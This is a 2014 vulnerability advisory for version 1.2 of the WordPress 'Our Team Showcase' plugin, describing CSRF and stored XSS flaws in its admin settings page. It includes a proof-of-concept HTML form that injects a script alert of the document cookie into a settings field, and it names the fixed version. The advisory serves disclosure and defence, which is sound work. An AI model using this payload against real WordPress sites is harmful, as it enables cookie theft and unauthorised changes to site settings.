Title: WordPress 'Our Team Showcase' plugin - CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/our-team-enhanced/
Notified WordPress: 2014/11/27
----------------------------------------------------------------

## Description: 
----------------------------------------------------------------
This plugin allows you to add, edit, search and display your team members on any page, or in a widget quickly and easily.
It comes with a couple of different styles to choose from.
Re-order team members with a simple drag & drop.
output your team members anywhere with the shortcode [our-team]
Boosts SEO with schema.org markup

## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
----------------------------------------------------------------
Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 

PoC:
Log in as admin and then submit the following form. 
  <form method="POST" action="http://[DOMAIN]wp-admin/edit.php?post_type=team_member&page=sc_team_settings" enctype="multipart/form-data"> 
     <input type="text" name="sc_our_team_template" value="grid"><br />
    <input type="text" name="sc_our_team_social" value="yes"><br />
    <text>sc_our_team_member_count: </text>
    <input type="text" name="sc_our_team_member_count" value="-1"><script>alert(document.cookie);</script>"><br />
    <input type="text" name="sc_our_team_save" value="Update"><br />  
    <input type="submit">
  </form>


## Solution
----------------------------------------------------------------
Update to version 1.3.